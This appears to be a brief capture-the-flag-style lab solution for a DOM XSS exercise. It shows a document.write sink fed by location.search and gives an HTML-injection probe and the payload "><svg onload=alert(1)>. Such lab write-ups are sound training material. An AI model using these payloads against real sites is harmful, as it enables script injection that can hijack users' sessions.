Skip to content

DOM XSS in document.write sink using source locati

DOM XSS in document.write sink using source location.search

Solution

Post basic HTML payload

Payload: "><b>test_here

Post payload to search

Payload: "><svg onload=alert(1)>